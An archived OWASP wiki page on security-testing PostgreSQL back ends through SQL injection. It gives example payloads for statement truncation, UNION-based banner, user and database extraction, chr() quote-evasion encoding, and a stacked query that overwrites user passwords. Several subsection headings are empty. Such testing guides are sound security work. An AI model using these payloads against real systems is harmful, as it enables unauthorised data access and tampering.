This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
OWASP Backend Security Project Testing PostgreSQL
- 1 Overview
- 2 Description
- 3 References
- 4 Tools
Overview
Description
Identifing PostgreSQL
When a SQL Injection has been found you need to carefully fingerprint backend database engine. DBMS Fingerprint paragraph allready discussed how to accomplish this task.
PostgreSQL Peculiarities
PHP Connector allow multiple statements to be executed by using ; as a statement seperator. SQL Statement can be truncated on vulnerable URL by appending comment char: --.
Example:
* http://www.example.com/store.php?id=1--hello world * http://www.example.com/store.php?id=1;--hello world
Banner Grabbing
Function version() can be used to accomplish this task.
select version():
PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
Example:
http://www.example.com/store.php?id=1 Acme Biscuits
http://www.example.com/store.php?id=1 UNION ALL SELECT NULL,version(),NULL LIMIT 1 OFFSET 1-- PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
Blind Injection
Inference
Timing Attacks
Single Quote (un)Escape
String can be encoded, to prevent single quotes escaping, by using chr() function.
* chr(n): Returns the character whose ascii value corresponds to the number * ascii(n): Returns the ascii value corresponds to the character
Let say you want to encode the string 'root':
select ascii('r') 114 select ascii('o') 111 select ascii('t') 116
We can encode 'root' with:
chr(114)||chr(111)||chr(111)||chr(116)
Example:
http://www.example.com/store.php?id=1; UPDATE users SET PASSWORD=chr(114)||chr(111)||chr(111)||chr(116)--
Current User
Current user can be retrieved with the following SQL SELECT statements:
SELECT user SELECT current_user SELECT session_user SELECT usename FROM pg_user SELECT getpgusername()
Examples:
http://www.example.com/store.php?id=1 UNION ALL SELECT user,NULL,NULL-- http://www.example.com/store.php?id=1 UNION ALL SELECT current_user, NULL, NULL--
Current Database
Native function current_database() return current database name.
Example:
http://www.example.com/store.php?id=1 UNION ALL SELECT current_database(),NULL,NULL--